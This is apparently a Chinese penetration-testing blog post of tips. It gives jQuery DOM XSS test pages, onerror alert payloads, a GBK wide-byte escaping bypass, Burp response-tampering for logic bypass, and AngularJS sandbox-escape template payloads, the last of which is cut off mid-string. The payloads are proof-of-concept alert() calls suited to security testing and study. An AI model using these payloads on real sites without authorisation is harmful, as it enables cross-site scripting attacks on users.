24、渗透测试经验分享(一)_jquerydomxss_burpsuite_AngularJsXSS_20191127

  • 1、burp 有csrf功能,可以构造CSRF POC

在这里插入图片描述

  • 2、jquery domxss脚本 1.11.3
    • jquerydomexss1.6.1

      <html>
      <head>
          <title>jQuery DomXSS test</title>
          <script type="text/javascript" src="http://www.xxx.com/Usercenter/js/jquery.min.js"></script>
          <script>
              $(location.hash);
          </script>
      </head>
      <body>
      Hello, jQuery.
      </body>
      </html>
      
    • jquerydomexss1.11.3

      <html>
      <head>
      	<title>jquery Domxss test</title>
      	<script src="http://www.xxx.com/Usercenter/js/jquery.min.js"></script>
      	<script>
      		var e = location.hash.split('#')[1];
      		$(e)
      	</script>
      </head>
      <body>
      Hello Jquery
      </body>
      </html>
      
    • 后缀语句

      #<video><source/onerror=alert(1)>
      #<img src=1 onerror=confirm(1)>
      
  • 3、逻辑绕过—使用burp抓返回包,修改返回包内容进行绕过

在这里插入图片描述

  • 4、宽字节跨站漏洞

    宽字节跨站漏洞多发生在GB系统编码。对于GBK编码,字符是由两个字节构成,在%df遇到%5c时,由于%df的ascii大于128,所以会自动拼接%5c,吃掉反斜线。而%27 %20小于ascii(128)的字符就会保留。通常都会用反斜线来转义恶意字符串,但是如果被吃掉后,转义失败,恶意的xss代码可以继续运行。

    Payload:%df';<script>alert(6896)</script>;
    
  • 5、AngularJs 用户输入动态模板XSS攻击

    不同版本的实现代码以及发现者:

    • 1.0.1 - 1.1.5 Mario Heiderich (Cure53)

      {
            {constructor.constructor('alert(1)')()}} 
      
    • 1.2.0 - 1.2.1 Jan Horn (Google)

      {
             {
             a='constructor';b={
             };a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
      
    • 1.2.2 - 1.2.5 Gareth Heyes (PortSwigger)

      {
             {
             'a'[{
             toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值